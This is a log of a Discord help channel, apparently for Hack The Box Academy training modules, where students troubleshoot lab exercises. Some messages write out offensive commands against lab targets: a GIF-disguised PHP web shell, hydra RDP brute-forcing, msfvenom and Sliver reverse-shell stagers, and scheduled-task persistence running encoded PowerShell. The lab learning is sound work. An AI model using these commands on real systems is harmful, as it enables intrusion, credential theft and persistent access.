#modules

1 messages · Page 346 of 1

timber hatch
#

ah omg

#

i havent thought that the flag is in the root directory, but yes int he question was /flag.txt

fading violet
#

One message removed from a suspended account.

#

One message removed from a suspended account.

dapper moth
#

Go for the releases

runic wigeon
#

does anyone that knows coding know how to open pdf files with a password on it? i got allot of pdf files but i seem to have forgetten the passwords for all. i know i need john the ripper and some other stuff if anyone knows please send a dm.

dim ridge
#

Hey all, first message here, is anyone available to help with 'the live engagement' on the Shells and Payloads Module in academy, is anyone free.
Module: https://academy.hackthebox.com/module/115/section/1139
I'm constantly getting errors that nothing in the forum has been able to help with.

The issue is with Host 2 172.16.1.12 with the exploit 50064.rb https://www.exploit-db.com/exploits/50064

i get the following in msfconsole
msf6 exploit(50064) > run

[-] Exploit failed: NoMethodError undefined method `split' for nil:NilClass
[*] Exploit completed, but no session was created.

I changed the script slightly as i noticed there was a similar section to this split error but commented out.

I then get a 404 instead and authentication failed

gloomy bramble
dapper moth
runic wigeon
gloomy bramble
west canopy
winter schooner
#

appreciate it bro

#

was impatient the first time so i didnt let hydra fully bruteforce

midnight galleon
#

this module will help you

gray yacht
#

Maybe you can use access from a previous question in this assessment to enumerate users with RDP access and target that user?

green portal
#

hey guys, so I'm a bit confused. If I install the HTB Parrot ISO and run it locally on a hypervisor (virtualbox or vmware) I don't need to play with the instances on the site right? Assuming I'll be connecting to the HTB network trough the openvpn

dim ridge
dim ridge
dim ridge
#

hahah are you serious, thats worked. But it had TARGETURI as mandatory! I didn't think it would let me run it without TARGETURI

#

I've been at this for hours, thank you!!

west canopy
#

np 😉

west canopy
winter schooner
old oasis
#

or is it just the same as having it blank

west canopy
dim ridge
#

Hey CB which question is it you're stuck on? Do you have the link for what stage your at? This seems familiar to me as I think i had the same issue, i remember trying the biggest dictionary, but it turns out one of the other dictionaries was what i needed

magic escarp
#

I'm not able to copy the files that I download in my computer to the spw machine. It's probably a stupid thing, but I can't. Anyone has the same issue?

ocean night
#

You can SSH / SFTP to your Pwnbox. The credentials and IP would be listed

#

..I think..

#

Yeah.. so expand your Pwnbox to full screen, you'll see the hostname in the URL, and credentials on the desktop

magic escarp
#

Thanks

ocean night
#

That should be a bit more obvious

#

as in.. on the platform, but it could be it is described in an introductory module

magic escarp
#

I will try, thank yoy

ocean night
#

Yup, confirmed you can SSH/SFTP

rustic sage
#

Is the Windows Fundamentals module overkill ? It's very thorough, geared more towards administration

midnight galleon
#

Active Directory Enumeration & Attacks
Living Off the Land

rdping displays a blackscreen

#

with the console being stuck at
[16:28:11:802] [6730:6731] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[16:28:11:802] [6730:6731] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel disp

midnight galleon
#

lemme try but why would xfreerdp not work:3

safe star
#

iono🤷‍♂️

midnight galleon
#

ok sounds like xfreerdp skill issue

#

but why

safe star
#

thats why

midnight galleon
#

GenericWrite can be used to targeted Kerberoasting right?

somber summit
#

Hello DACL 1 skill assessment question 3.
I changed the owner of the NETWORK ADMINS to mathew and give him FullControl over it but when i readLAPS i dont have any results. I can't ping ws01.inlanefreight.local as well

midnight galleon
#

if so, the answer in AD enum & attacks - Access Control List (ACL) Abuse Primer needs to be changed cuz it says GenericAll (which is true but only cuz GenericWrite is a subset of it) so the answer should be GenericWrite

viral snow
#

I think those credentials only apply to traverse.jar

cobalt aspen
#

where rockyou.txt is located on pwnbox

#

found it

cobalt aspen
#

did someone sucessfully install sqsh, i see its hell pain to install it

#

i dont know why all that tools that are mentioned in entire path, are not installed by default on pwnbox

safe star
#

I think I used it once

#

Impacket Mssqlclient >

supple meteor
#

Having trouble with
Password Attacks
Network Services:

Find the user for the RDP service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer

Command im running is:
hydra -L username.list -P password.list rdp://10.129.141.43 -t 32

I know the answer is c** and 7** but cant get it to actually populate through hydra

cobalt aspen
safe star
supple meteor
cobalt aspen
safe star
supple meteor
#

actually... just had to change to t1 yup

#

just lowered the threads and it worked

lilac roost
#

Hello, good night, can someone tell me the answer to this question: "Enumerate the hostname of your target and submit it as the answer. (case-sensitive)" in the module Network enumeration with nmap???

lilac roost
safe star
#

try using -A or -sC

lilac roost
heavy edge
#

-sS -sC -sV -O

#

That will give you the histnsme

lilac roost
heavy edge
#

Yep

#

-Pn if it’s a windows machine as well

#

Windows will sometimes block icmp pings

knotty gust
#

Is anyone able to get the flag on the File Inclusion, LFI and File Uploads section? When I go to cat the flag file, the only output I'm seeing is GIF8 rather than the actual flag.

#

Tried resetting the target a few times but it yields the same result. Let me know if anyone else has the same issue.

cloud urchin
#

haven't seen that issue

#

which payload are you using?

knotty gust
#

I was doing the basic GIF payload and it does have RCE, but let me try another payload to see if it has the same problem

cloud urchin
#

mine was prepended with gif8 but it still worked

#

i just tried again and it worked for me, are you using the right payload?

knotty gust
#

Weird. Using the GIF payload means the flag only spits out GIF8 for me, but using the ZIP payload results in me getting the actual flag, and a different file name at the root directory despite it being the same target

cloud urchin
#

what command did you use to create the gif?

knotty gust
#

echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif

#

It gives remote code execution but the flag file doesn't work for some reason

cloud urchin
#

ahh

knotty gust
#

Brb, OS update

cloud urchin
#

i was able to do it and read the flag with the gif

#

look at the filename closely, did it prepend gif8 and then you included that in the filename when you catted it?

knotty gust
#

Hmm, I'll give it another shot when my laptop is done updating, I think I might've missed doing that

cloud urchin
#

yeah at first it didn't work but it was because the GIF8 got tacked on to the first part of the name, after removing it, it worked fine

knotty gust
#

Yeah, I forgot to remove GIF8 from the start of the flag file name. Thanks!

#

Very simple mistake to make

viral snow
#

I'm running into the same problem. How did you fix it?

cloud urchin
#

zombiiieee said how they fixed it in the very next message, if that helps

viral snow
quick pulsar
#

Hey, I'm doing the "Information Gathering - Web Edition" Skill Assessment, but I'm unable to complete the question related to crawling inlanefreight.htb for the email address.

All of the crawlers I used on that domain and the subdomain are coming back with no results for emails found

Does anyone have an idea what I might be doing wrong?

#

I also haven't been able to get whois to output anything more than a "400 bad request". The command I've been using is "whois -h inlanefreight.htb:<port> <ip addr>

pine dome
#

Can someone help me with the Advanced Xss and CSRF exploitation module - skill assessment?

I was able to become moderator, and find a way to execute XSS (very limited though); now i'm stuck on how to exfiltrate the admin page

cloud urchin
fallen sentinel
#

Does anyone playing battleground now

pine dome
supple meteor
#

can someone help me Wi-Fi Penetration Testing Basics - Skills Assessment?
after Aireplay-ng -0 -5 workstation 02:00:00:00:02:00 and even spoof MAC as that address + 2 boardcasting address
(I've got ESSID and BSSID)
then try airodump-ng w/ all band (abg) , I can't get ANY handshake after an hour
after getting handshakes, I can crack pw and connect
the point is, how to get handshake when 02:00:00:00:02:00 is using all abg bands, and MAC spoofing may not work?

cloud urchin
#

like the ssid/bssid

fierce iris
#

hey guys . so im currently doing the metasploit portion of the introduction and these ports and services came up
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
25/tcp filtered smtp
111/tcp open rpcbind 2-4 (RPC #100000)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
it now wants me to search using searchsploit but when i do, the ssh type is too new/no exploits. am I missing something?

supple meteor
#

yeah, after I got ESSID (H**), I though this assessment should be Easy one
so I go aireplay-ng -0 -5 (but --test not work) and just airodump-ng -c 1

cloud urchin
#

dm me

viral snow
#

Any help with my issue?

I modified the invoker.java file, as instructed. When I try to open fatty-server.jar, I end up with a weird jumbled mess.

cloud urchin
viral snow
fierce iris
#

module 77 section 843?

#

i think lol

cloud urchin
#

i'm not looking that up

#

just say the names..

fierce iris
#

publix exploits

#

public

cloud urchin
#

there are multiple introduction modules, multiple moduels with metasploit

fierce iris
cloud urchin
#

you're going to have to say the exact ones

#

that's the module "getting started" and section "public exploits"

cloud urchin
# fierce iris public

the target that spawns has only one port, try visiting it in a web browser. the question kind of gives it away (it says it'a a web server)

#

you're not meant to nmap scan

viral snow
quick pulsar
# quick pulsar I also haven't been able to get whois to output anything more than a "400 bad re...

Ugh, I figured it out. I really hate the way they framed the questions.

"What is API key the inlanefreight.htb developers will be changing too?"

The way the question was framed the question made me assume the info had to be on the original domain. Kinda frustrating to do everything right, but on the wrong domain and just assume that because of vhosting that I was putting in the commands for recon spider wrong.

Maybe I'm just not cut out for pen testing. It seems like I always get something wrong and have to spend hours just because of simple little nuances like this.

fierce iris
#

ahhhh i see. okay, i will investigate.

fierce iris
#

yeah no im lost dude. i looked up the plugin and the exploit didnt work(probably wrong wordpress exploit)

#

thats all that comes up though. when i execute the exploit it just gives me a crisp high five for executing nothing lol

cloud urchin
fierce iris
#

yeah, it comes up with the same exploit in searchsploit and in metasploit

cloud urchin
#

did you setup all your metasploit options

fierce iris
#

yes. the only one needed was RHOSTS, I set to RHOSTS => 94.237.58.155

cloud urchin
#

probably need a port too

#

that web server is only running on that specific port

fierce iris
#

OH

cloud urchin
#

also what file you want to read

#

type options and make sure you read them and have them all the required ones filled out

fierce iris
#

so the 5 digit at then end

cloud urchin
#

yes

fierce iris
#

okay, i was tcp porting to 22

#

bad verbage sorry

cloud urchin
#

nah, when the target contains the port the module challenge is going to be specific to that port

fierce iris
#

i see. ill reattempt

cloud urchin
#

they're just docker containers that get spun up publicly so they change the ip/port all the time when you spawn them

fierce iris
#

you are the best man. thank you. that took me far too long haha

#

alot of nuances to take in this first week

winter plume
fierce iris
rustic sage
#

Hello guys. I need some help, I'm just starting out, and after going to forum and then Google nothing really helped. I'm at "Getting Started" Module and there is optional exercise. I managed to figure out where to get the banner, but the command is just not working.

ocean night
#

You're trying to connect to port 22

#

That is not the correct port

#

Look at the IP provided for your instance (and port number)

rustic sage
#

Oh thanks! Now it worked

ocean night
#

👍

smoky iron
#

Hi, I have an issue with the flag 'Wi-Fi Penetration Testing Basics' skill assessment and question 1. The question is: What is the name of the WiFi network with the BSSID D8:D6:3D:EB:29:D5?
When I enter the name of the WiFi network, I get an incorrect answer.

wifi@WiFiIntro:~$ iwlist wlan0 scan | grep 'Cell|Quality|ESSID|IEEE'
Cell 01 - Address: D8:D6:3D:EB:29:D5
Quality=70/70 Signal level=-30 dBm
ESSID:"<REDACTED>"
IE: IEEE 802.11i/WPA2 Version 1

stable jasper
#

where can i report a deadlink found in a module ?

ocean night
stable jasper
#

ty

ocean night
#

You're welcome

hoary depot
#

helen b. kellerin sadglas

smoky iron
stable jasper
#

Hello, i'm in the Pivoting, Tunneling, and Port Forwarding module and the RDP and SOCKS Tunneling with SocksOverRDP, i already disable the real time protection but got this error message, any hint ? ty

red shuttle
#

Hi! Anyone completed Wifi testing module?
almost finished module and skills assesment, getting some troubles while connecting to hidden network (got 2 previous flags)

median gale
dapper moth
rustic sage
#

Problem at "getting started" When I try to check the content of flag.txt by using cat/ head It says: command not found.

autumn pilot
#

Download the file locally, and then try to get the contents of it

rustic sage
#

Thanks!

opal nexus
acoustic sparrow
#

Does anyone know if HTB academy will offer a sale on Cubes for blackfriday?

rich zinc
# dim ridge Hey CB which question is it you're stuck on? Do you have the link for what stage...

Hey thanks for responding
lol if it’s only a dictionary thing
That’s the question:

Using the known subdomains for inlanefreight.com (www, ns1, ns2, ns3, blog, support, customer), find any missing subdomains by brute-forcing possible domain names. Provide your answer with the complete subdomain, e.g., www.inlanefreight.com.

That’s where I am:

https://academy.hackthebox.com/module/144/section/1253

cobalt aspen
#

Module: Attacking common services
Section: Attacking email services
I found password for previously found username, am i supposed to login to mail via client or i have to do something different?

fickle bison
#

anyone finished Windows Lateral Movement module Skills Assessment? RDP seems to be unstable as I was always getting disconnected from the session

#

I also moved laterally to another user and it seems the flag is not in the Desktop folder wtf

opal nexus
cobalt aspen
#

yeah i found both

#

do i need to authenticate over pop3 and then retrive all emails?

#

first i bruteforced username, then password

#

with provided lists

regal viper
#

Should I be using NAT or bridged mode on my VM? I seem to be having a lot of issues with stuff either constantly timing out or connection dropping etc

cobalt aspen
quiet trout
quiet trout
shadow yacht
#

Hello, does anyone know how to get the jimmy user password in the ADCS module skill assessment? I used hashcat to burst without results, can you give me some tips

fickle bison
quiet trout
#

just as a sanity check, yknow, sometimes they like to mix it up

fickle bison
#

it was explicitly told in the questions bro

quiet trout
#

gotcha

fickle bison
#

are you doing ADPT job role path too?

quiet trout
#

No, i was just trying to offer a suggestion im on SOC Path at the moment

#

!mods

pseudo kiln
#

did something change with academy? now I have to login like 4 times throughout the day instead of once each day

calm abyss
#

I ma having problems with a module Using CrackMapExec - Stealing Hashes.

The chisel is up and running but when i try to connect to a share on 172.16.1.5 the connection just drops.
I used a nmap scan and its saying that the host is up

proxychains4 -q nmap -sV -Pn 172.16.1.5
Nmap scan report for 172.16.1.5
Host is up.
All 1000 scanned ports on 172.16.1.5 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)

versed ocean
#

hello! can someone help me with a pwn challenge?

vagrant wraith
#

hey guys might sound a bit silly yet can anyone elaborate the question cause i really don understand what exatcly its asking for "What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word) "

calm abyss
pseudo kiln
#

have you tried setting this option ?

dapper moth
#

This SA was constructed as to pivot from one host to another

calm abyss
cloud urchin
dapper moth
#

You can user the auto-reconnect flag in xfreerdp

vagrant wraith
calm abyss
# pseudo kiln have you tried setting this option ?

We need to configure proxychains to use the Chisel default port TCP 1080. We need to make sure to include socks5 127.0.0.1 1080 in the ProxyList section of the configuration file as follows: socks5 127.0.0.1 1080

vagrant wraith
#

i just dont understand what exactly the question is asking for

pseudo kiln
#

idk, that timeout thing usually does the trick for me; I did the CME module using ligolo-ng instead, so I can't help much which chisel

dapper moth
calm abyss
#

i am using my own machine but ill give it a try just in case

cloud urchin
vagrant wraith
#

i see!

#

ima try that out thanks man

sick whale
#

In the documentation module, anyone manages to extract the example report from the archive in the resources? I'm getting an error.

Thank you 🙂

quiet trout
calm abyss
vagrant wraith
quiet trout
#

Its asking for the name of the Object ACE if im not mistaken

final shale
#

I think I found an error in the Command Injection Module
On the lab under section "Identifying filters", the answer that is considered correct is actually not.
The new-line "\n" character gets rejected with invalid input in the exercise, so I cant be the correct answer the correct answer should be "&"
Nevermid. It works properly once URL encoded

cloud urchin
final shale
#

Hm you know what. They probably wanted it to be url encoded. still in that case it seems like there are 2 operators that are not blacklisted

#

actually no i think i jumped to quickly over here. If its url encoded it works properly

cloud urchin
sick vine
#

hey can a mod dm me for an academy vpn question?

tacit bay
#

has anyone else ever had trouble using "execute" within sliver? I'm currently doing the sliver c2 module - maintaining persistence with scheduled tasks, within a SYSTEM shell, if I run the command:
execute powershell 'schtasks /create /sc minute /mo 1 /tn SecurityUpdater /tr "powershell.exe -enc <BASE64HERE>==" /ru SYSTEM'
It works fine, verified it in the task scheduler GUI.

However - if I try the exact same command but within the sliver session (still as SYSTEM) - the command runs, I get no output & checking the task scheduler, nothing is there.. Scratching my head on troubleshooting this one
sliver (http-beacon1) > execute powershell 'schtasks /create /sc minute /mo 1 /tn SecurityUpdater2 /tr "powershell.exe -enc <BASE64HERE>==" /ru SYSTEM'

wide moth
#

Did anybody pass assessment of Whitebox attacks? I need a hint. I think that the 1st step should be to exploit type juggling with password of Larry. I’ve tried different ways to calculate magic hash (using salt), but all my vocabularies dont provide it to me.

dapper moth
raw moth
#

Hello, I was scammed out of money by a fake escort who pretends to be someone else on Instagram. Can someone help me recover my Instagram account?

#

I also have part of his number

cloud urchin
#

No one here can help you with that, you need to reach out to Instagram

final shale
old oasis
crystal notch
#

Someone have same issue as me that I cant connect into windows RDP in Active Directory Enumeration & Attack module? I am using PwnBox and xfreerdp to connect.

rare swan
#

windows boxes are always annoying - could be

#

which section?

crystal notch
#

Internal Password Spraying - from Windows and LLMNR/NBT-NS Poisoning - from Windows both seems not working, I have waited hour and still the same issue

#

if this screenshot helps a little

dapper moth
#

Put the password in quotes

crystal notch
analog dock
#

Ooo

rare swan
#

strange didnt had to put the password within quotes

restive lintel
#

**Module: **Intro to C2 Operations with Sliver [Probing the Surface]

Steps I followed based on the module:

# SLIVER-CLIENT
profiles new --http 10.10.15.200:8080 --format shellcode htb

stage-listener --url tcp://10.10.15.200:4443 --profile htb

http -L 10.10.15.200 -l 8088

generate stager --lhost 10.10.15.200 --lport 4443 --format csharp --save staged.txt

# MSFVENOM
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.15.200 LPORT=4443 -f aspx > sliver.aspx

I copied the payload from staged.txt to sliver.aspx and uploaded via the website but no call back

#

Before

#

What is the problem?

rustic quiver
#

Hey guys, I'm a bit stuck in the footprintin module. Its telling me to enumerate the SMTP service further and find the username, and i've tried VRFY, i've tried smtp enum in msfconsole with the provided wordlist. Am I missing a step, or what else could I do?

dapper moth
restive lintel
#

Just working on it

dapper moth
#

Don’t remember having any issue
But can check when I get home

restive lintel
rare swan
rustic quiver
rare swan
#

use the wordlist provided

rustic quiver
rare swan
#

At least for me the tool i mentioned worked - so you can use that I guess

#

But somehow not mentioned in the section - kinda strange

rustic quiver
rare swan
#

Could be...

#

Always was wondering how in the world it would be possible to complete the CPTS path within 43 days - but now with guided mode it could be even possible within 22 days - lol

rustic quiver
rare swan
#

still not finished yet - took a break for about a year

#

was getting annoyed by it

fathom pendant
#

My best advice is to ignore the estimate

#

It's only there for businesses to get an estimate for how long it should take their employees, that's it

#

It doesn't take into account any skill issue, technical issue, or other extenuating circumstances

rustic quiver
#

Marcie could you help me if you have time? It feels like i've done every step possible

rare swan
#

Actually my goal is to just finish it for completness - but for sure no exam

rustic quiver
dim ridge
#

Im going for CPTS too, had some hold ups on the way though with some of the modules in the pathway

fathom pendant
#

You need to adjust the timer for smtp-user-enum

rare swan
#

-wwwwwwwwwwwwwwww

rustic quiver
fathom pendant
#

Also are you sure you adjusted the right thing

#

20-25s is what's average

rustic quiver
fathom pendant
#

Use the smtp-user-enum tool

#

Not the nmap script

#

Because if you use the nmap script you also need to put the variables in

#

The -w that you're tacking on is only for nmap, not the script being used

rustic quiver
rare swan
#

@fathom pendant do you know a rough percentage of how many pass the exam - just wondering

dapper moth
#

Got a callback with no problem

fathom pendant
rare swan
#

but for sure not first try

fathom pendant
#

The attempt/fail rate isn't released by htb

dapper moth
rare swan
#

sure

#

why is it a secret?

fathom pendant
rare swan
#

got it

fathom pendant
rare swan
#

One could get a felling by reading the cpts forum - lol

fathom pendant
#

Eh

dim ridge
dapper moth
#

Sure

fickle bison
# dapper moth This SA was constructed as to pivot from one host to another

bro I tried to perform double RDP in an another host inside the network using non standard port and it does not even accept the password I’ve got..It says the user has no RDP rights towards that host.

I already setup pivoting and tried to look for open ports in that other host and just does not return anything

#

idk if the lab is broken or do I need to do some firewall bypass with nmap so I can see some ports

dapper moth
rustic quiver
#

Okay so this is the cmd I used: smtp-user-enum -M VRFY -U ./footprinting-wordlist.txt -t STMIP -m 60 -w 20 10.129.168.3 its working just not returning any results, is there something I typed wrong?

fickle bison
# dapper moth Try other type of Remote Service

idk man, I was trying to look for open ports and nmap just does not get through pivoting..it returned nothing thats why I am not able to know what specific port is opened on that host so I can pivot..Most likely it is using a non standard port for the other type of remote service

slim egret
#

host unreachable?

dapper moth
#

The services should be methodically assigned to non standard ports. So if you found the service running on a specific port in a Host, it should be the same non-standard port to the other Hosts in the environment

#

You can use the port scan you did for the first target as a baseline

fickle bison
#

got it thank you!

cobalt aspen
#

Module: Sqlmap Essentials
Section: Attack Tuning
What's the contents of table flag6? (Case #6)
how can i know which prefix to use im so confused

unreal sinew
#

So what's with all of the Mass IDOR Enumeration section being about a GET request when the lab is a POST request? This is frustrating that nothing matches compared to every other module before it.

midnight galleon
#

and this theme is of switching is used alot in the academy btw

unreal sinew
#

Oh come on, what is this, OffSec now?

midnight galleon
#

especially with skill assessments

unreal sinew
#

I understand on the skills assesment, but every single module before this one walks you through it.

midnight galleon
unreal sinew
#

I have OSCP from this year, I know the stupidity they pull. This module is reminding me of that pain of things not matching up.

supple meteor
#

https://academy.hackthebox.com/module/147/section/1315
Module I need assistance with:
Apply the concepts taught in this section to obtain the password to the ITbackdoor user account on the target. Submit the clear-text password as the answer.

I have the hashes for the users, but can't hashcat is being exhausted

indigo rune
strange pivot
strange pivot
strange pivot
indigo rune
#

This module looks fun

supple meteor
#

Oh damn, im back. Hashcat decided to start working so I got it 🙂
@strange pivot @indigo rune

dire abyss
acoustic sparrow
#

So no cube sale on Blackfriday?

wary plover
#

<@&861185840277487616>

urban sage
#

Rats. I was slow.

wary plover
# urban sage Rats. I was slow.

I was actually casually reading the message while distracted on something else until mid reading i was like: "wait a minute this is not supposed to be here" 😅

urban sage
#

Looked about like this I'm guessing.

dusk crater
#

hi guys, i'm in the cracking pasword module. I need to connect to evil-winrm but i get this error
Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error

Error: Exiting with code 1

#

any advice?

fathom pendant
#

Cry

dusk crater
#

i did it 🙂

fathom pendant
#

It's a weird ruby error that doesn't detect openssl

#

I don't think there's a fix aside from reinstalling ruby/os

dusk crater
twilit burrow
#

Question for anyone that can answer, I work with a lot of Windows based machines and on top of learning Pentesting I would like to also be able to keep up with my coworkers on Windows, would that module be the right one to start with?

main halo
twilit burrow
main halo
#

i'll be honest if you cannot handle at LEAST 2 os's this is not the job for you

#

but a good vm of kali normal windows

start with the starter stuff keep to fundimentals and work up (they are marked)

twilit burrow
twilit burrow
dim wolf
#

if you feel that you're lacking or if you want to brush up, then that's fine

#

if you're planning on learning pentesting then you will have to learn more than just that though

twilit burrow
#

I would like to learn basics and then focus more on pen testing. And I am semi familiar with normal windows usage, but getting more into it I think will help

dim wolf
#

then you should probably complete the Information Security Foundations path then move onto the Penetration Tester path in HTB Academy

main halo
twilit burrow
dim wolf
#

the Infosec Foundations path should prep you enough to start learning pentesting in the Pentester path

#

it's also what i did

twilit burrow
#

I will start on that one tomorrow then. Thank you.

#

I figured the more easy things I do the better.

main halo
#

ya go fundimetnals > easy > move on from there my suggestion

dim wolf
#

like TwinTail said, the fundamentals are very important, so soak in as much info as you can

twilit burrow
#

I have a blank notebook next to me with a few pens.

main halo
dim wolf
#

if you prefer that for notetaking then that's fine

twilit burrow
dim wolf
#

a lot of us use Obsidian for our notes

main halo
#

no in kali

twilit burrow
twilit burrow
twilit burrow
main halo
# twilit burrow I will look into that

you can takes notes as well as tree notes (children notes of notes )

also pictures even video dropped in there so i save cheat sheets and how to's as well as "current works" or "how i did this"

twilit burrow
#

Thank you both

main halo
twilit burrow
main halo
#

i do main
child
child
lots of childrend per that child for each topic)

its free easy comes with kali enjoy and gl

main halo
dim wolf
#

just ask your question with the module and section name, the question you're working on, and what you have tried

#

you can also explain your understanding of the situation you're in

main halo
#

burp says its cfide (cold fusion adobe ) this is my GUESS but i have tried using every combo of msf

i tried to fuzz

i need a direction

mental tapir
main halo
#

msfconsole module is sending a request to is CFIDE

i tried to forward i tried to attack with 28 attacks nodda

mental tapir
main halo
main halo
# mental tapir On its local? What does that mean?

the ip is local so use the vpn

if im here are you are there im not local to your house but if i use a vpn i might as well be IN your home. now im local so i can touch a local network

its the same thing. with the vpn on (from the vpn file they give you) it works fine. also dont over think it i fooled myself making this harder than it was when i did it.

main halo
mental tapir
main halo
#

10.x.x.x right?

main halo
cloud urchin
#

not if it's not your ip

#

i'd consider a local ip the ip address that's on the host you're working on

#

that ip is only local to a remote machine

main halo
cloud urchin
#

he said he was connected to the vpn

#

@mental tapir what are the results when you type ip a in your terminal?

main halo
mental tapir
main halo
#

🤣 all this time banging my head on a wall and all they wanted was the name.

cloud urchin
cloud urchin
main halo
#

ya im sorry @dim wolf i posted the answer trying to ask the question but i had ZERO idea it was the answer i deleted it.

mental tapir
cloud urchin
mental tapir
cloud urchin
main halo
#

im gonna go lay down i realize i just wasted 56 hours trying to answer a question i had the answer to from the first 14 min . ty for help.

mental tapir
mental tapir
mental tapir
#

Does a new VPN key have to be downloaded and loaded for each new section in the module or can the VPN key be reused from the previous section?

cloud urchin
pine dome
#

Hi everyone, currently stuck on Advanced XSS and CSRF Exploitation skills assessment where I managed to become moderator, but I don't find the way to extract the admin.php

cloud urchin
pine dome
#

When say a page that I can now access as a moderator, you mean a new page (and if this is the case maybe I don't find it yet), or you refer to a functionality that I can use now?

cloud urchin
#

functionality

#

you can do something you couldn't before as a mod

rustic sage
#

Hi

storm elk
trim quartz
#

Ok... I am soooo stuck on the NoSQL Skills Assessment II. I know that when you enter something correct it gives one response and when its wrong you get a different response. I just can't work out how to exploit 😦 Has been sending me mad for ages, I even moved on to the next module to think about it but still can't work it out

red shuttle
#

hi there!
having same issue
have u solved that?

thin citrus
#

Still hoping that someone can help me with #modules message I don't understand why it works locally and not on the target machine.

red shuttle
celest sigil
#

Hello, trying to do this question on Linux Privilege Escalation > Capabilities. I have changed the vim so the root file does not need a log in. Not sure what the next step is to get the flag. any tips?

#

this is the question:
SSH to target with username "htb-student" and password "HTB_@cademy_stdnt!"
Escalate the privileges using capabilities and read the flag.txt file in the "/root" directory. Submit its contents as the answer.

storm elk
glacial minnow
#

guys

#

is something wrong with wayback section from information gather

#

the iana.org part i got the date from the footer but htb says it's wrong.

stable jasper
#

i did it recently and didnt have any problem, are you sure you are providing the date the way they show you ?

#

and dont let blank space after your answer

glacial minnow
#

i found a blank space before the answer :(

glacial minnow
pastel lark
#

Yall i tried installing kali using live boot on a flash drive and i accidentally removed partiton of my c drive which contained windows and now its not booting into windows

storm elk
#

There's not much we can do about that

dapper moth
pseudo kiln
#

anyone had issues with running kerbrute with proxychains ?

kali@kali:~/Downloads/NXC [30-10-2024 10:46]$ proxychains4 -q /opt/kerbrute/kerbrute_linux_amd64 userenum -d INLANEFREIGHT.LOCAL --dc 172.16.15.3 jsmith.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (9cfb81e) - 10/30/24 - Ronnie Flathers @ropnop

2024/10/30 10:46:59 >  Using KDC(s):
2024/10/30 10:46:59 >      172.16.15.3:88

2024/10/30 10:47:09 >  [!] apayne@INLANEFREIGHT.LOCAL - failed to communicate with KDC. Attempts made with UDP (error sending to a KDC: error sneding to 172.16.15.3:88: sending over UDP failed to 172.16.15.3:88: read udp 192.168.153.160:35532->172.16.15.3:88: i/o timeout) and then TCP (error in getting a TCP connection to any of the KDCs)

and similar enumeration works fine with netexec

kali@kali:~/Downloads/NXC [30-10-2024 10:41]$ proxychains4 -q nxc smb DC01.INLANEFREIGHT.LOCAL -u jsmith.txt -p whatever --kerberos | grep -v 'UNKNOWN'
SMB                      DC01.INLANEFREIGHT.LOCAL 445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB                      DC01.INLANEFREIGHT.LOCAL 445    DC01             [-] INLANEFREIGHT.LOCAL\adunn:whatever KDC_ERR_PREAUTH_FAILED 

shut sequoia
#

How to text in general

storm elk
midnight galleon
#

can somone give me a IRL scenario where a user account would have DS-Replication-Get-Changes-All and is not DA?

#

like he is using account x and then started account y and transfered everything there?

rustic sage
#

But the gist of it is admin misconfig

midnight galleon
#

I would assume account x would be deactivated then (there is a chance it isn't, but like DCSync attack is talked about everywhere that this sounds like a very lil chance)

normal sand
#

Is there a way to get a list of all the types of functions on LOLBAS? It's easy to do on GTFO bins since it's listed right at the top, but I don't know if there's such a way on LOLBAS.

midnight galleon
#

hmmmmmmmhmmmHug
Ok, thanks for the insight

rustic sage
#

Just in terms of it being able to solve it for you faster than ppl on this chat

normal sand
#

Just asked GPT and it replied saying it doesn't kekhands

rustic sage
#

No way lmao, ima check

#

This is directly from chatGPt

#

Literally copy pasted your whole question there lol

rustic sage
#

I need help with Getting Started | Public Exploits | Try to identify the services running on the server above.

I've already spent like 2 hours on this and I dont understand how to solve it, when I scan the target Ip using sudo nmap -sV -sC -p- -T5 94.237.63.215 It just gives me this:

fiery berry
rustic sage
neon furnace
#

anyone available to give me a sanity check on HTTP Attacks TE.CL module's task? just wanna ask whether my assumptions are correct

neon furnace
visual umbra
#

Hey. Im in Skill Asssement for Web Fyzzing, im @ "Before you run your page fuzzing scan, you should first run an extension fuzzing scan. What are the different extensions accepted by the domains? " i just get tvo extentions from all 3 difrent subdomains i finded, but HTB says my answare is wrong.. How do i make the answeare. like ext1. , ext2. etc or no , or what im doing wrong?

terse tapir
#

hi! I am studying for the CPTS exam and I am following the path. At the moment I'm at the Nmap Scripting Engine section. I found the flag but is not accepted...any clues?

visual umbra
#

Some times is more then one flag in the lab, maby you get the wrong one..

terse tapir
#

oh ok

thin citrus
#

Is someone available for Senior Web Penetration Tester - Intro to Whitebox Pentesting - section command and blind exploitation?

visual umbra
#

My problem was soloved

storm elk
#

Feel free to dm me to avoid spoilers.

terse tapir
crisp solstice
terse tapir
#

I just found the flag without even using nmap lol 😄

crisp solstice
#

Well done!!

terse tapir
#

nope. not well done. I must use nmap. so i'll dig deeper with nmap 😉

sly pumice
#

Hello

#

Can I hack through the phone?

sly pumice
#

Can I?

terse tapir
neon furnace
storm elk
neon furnace
#

So in this case don't get why people are saying don't ask to ask, if you did this for boxes you'd be banned

storm elk
neon furnace
#

coz I don't want to just DM anyone out of blue either

sly pumice
storm elk
#

YEah, that won't be appreciated as its for modules and not everyone does modules

#

but yeah, dm me 🙂

storm elk
sly pumice
#

Please answer me

storm elk
storm elk
#

I am asking what exactly it is you are trying to do

sly pumice
#

I want to learn hacking and cyber security

#

ok bye

neon furnace
#

you can

#

but you need a computer OMEGALUL

sly pumice
#

But I have just phone I don't have computer

